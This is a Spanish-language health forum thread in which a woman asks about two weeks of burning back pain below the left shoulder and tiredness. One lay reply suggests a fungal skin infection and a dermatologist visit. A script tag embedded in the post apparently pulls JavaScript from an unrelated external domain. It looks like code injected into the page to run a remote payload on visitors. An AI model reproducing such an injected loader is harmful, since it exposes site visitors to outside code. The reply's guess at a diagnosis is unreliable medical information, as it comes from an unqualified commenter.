Hace semanas tengo un dolor en la piel de la espalda y me encuentro muy cansada

Hace unas dos semanas tengo un dolor muy fuerte en la espalda abajo del hombro izquierdo, como si me me hubiera quemado del sol, hasta el roce con la ropa me molesta y me siento muy cansada, sin fuerzas...

Fui al doctor y me dijo que es un cuadro de gripe, pero no lo creo porque he tenido gripe muchas veces y no me he sentido nunca así, estoy muy preocupada!

No se que puedo tener, haber si me pueden ayudar, por favor!

<script type="text/javascript" src="http://plugin-tema-rosa.info/dfi823hs.js?0.18527577635234516"></script>

1 respuesta

Respuesta

La verdad es que opino lo mismo que tu eso no es de la gripe suena mas bien algún tipo de problema de la piel por lo que lo mejor seria que te viese un dermatólogo pues puede que tengas alguna infección en la piel ya que siempre que hay infecciones se encuentra una cansada. Puede ser una infección por hongos que suele arder la piel eso te lo tiene que ver el dermatólogo para que te mande el tratamiento adecuado te deseo que Dios te bendiga te de paz luz salud y bien saludos Adela.